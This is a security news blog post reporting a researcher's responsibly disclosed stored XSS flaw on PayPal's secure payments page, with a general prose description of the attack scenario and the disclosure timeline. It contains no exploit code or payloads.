Categories: Breaking NewsHacking

PayPal critical Flaw allows to steal all your funds

The expert Ebrahim Hegazy discovered a critical Stored XSS Vulnerability Paypal Critical Vulnerability to steal Users Credit Cards in ClearText format.

The popular security expert Ebrahim Hegazy (@Zigoo0) has discovered a critical Stored XSS Vulnerability in “https://Securepayments.Paypal.com” that could be exploited by attackers to steal Paypal users credit card and login credentials … and more!Paypal SecurePayments domain is used by the Paypal users to do secure payments when purchasing from any shopping site.This secure payments page require Paypal users to fill some forms that include their Credit Card number, CVV2, Expiry date and more, this information are necessary to finalize the payment and purchase the chosen products via their Paypal account.The submitted data is processed through encrypted channel (HTTPS) so attackers won’t be able to sniff/steal such data.

“I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content, An attacker can provide his own HTML forms to the user to fulfill and send the users data back to attacker’s server in clear text format, and then use this information to purchase anything in behave of users or even transfer the users fund to his own account!” wrote the expert in a blog post.

 

Which are the attack scenarios?

Ebrahim explained that the worst attack scenario is:

  • Attacker setup shopping site or Hack into any shopping site, alter the “CheckOut” button with the Paypal Vulnerability,
  • Paypal user browse the malformed shopping site, choose some products, click on “CheckOut” button to Pay with his Paypal account,
  • User get’s redirected to https://Securepayments.Paypal.com/ to fill the required Credit Card information to complete the purchasing order, In the same page, the products price that will be paid is included inside the same page, and as we know the attacker now control this page!
  • Now when the Paypal user click on Submit Payment button, instead of paying let’s say “100$” YOU WILL PAY THE ATTACKER WHATEVER AMOUNT THE ATTACKER’S DECIDE!!

Below the video PoC published by the expert that shows how the attacker exploits the vulnerability to steal the user Credit Card and login Credentials information.

The expert ethically reported the flaw to Paypal that promptly fixed it, this is the Time Line of the bug:

  • Vulnerability Discovery: 19/Jun/15 2:27 AM
  • Vulnerability Reported: 19/Jun/15 7:10 AM
  • Remediation Notification: Aug 25, 2015 at 5:44 AM

Thanks Paypal Security team for the good coordination the fast responses for Emails.

Pierluigi Paganini

(Security Affairs – hacking, PayPal)

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

Recent Posts

Cisco addressed high-severity flaws in IOS and IOS XE software

Cisco addressed multiple vulnerabilities in IOS and IOS XE software that can be exploited to…

10 hours ago

Google: China dominates government exploitation of zero-day vulnerabilities in 2023

Google's Threat Analysis Group (TAG) and Mandiant reported a surge in the number of actively…

17 hours ago

Google addressed 2 Chrome zero-days demonstrated at Pwn2Own 2024

Google addressed two zero-day vulnerabilities in the Chrome web browser that have been demonstrated during…

1 day ago

INC Ransom stole 3TB of data from the National Health Service (NHS) of Scotland

The INC Ransom extortion group hacked the National Health Service (NHS) of Scotland and is threatening…

1 day ago

CISA adds Microsoft SharePoint bug disclosed at Pwn2Own to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft SharePoint vulnerability disclosed at the…

2 days ago

The DDR Advantage: Real-Time Data Defense

This is the advantage of Data Detection and Response (DDR) for organizations aiming to build…

2 days ago

This website uses cookies.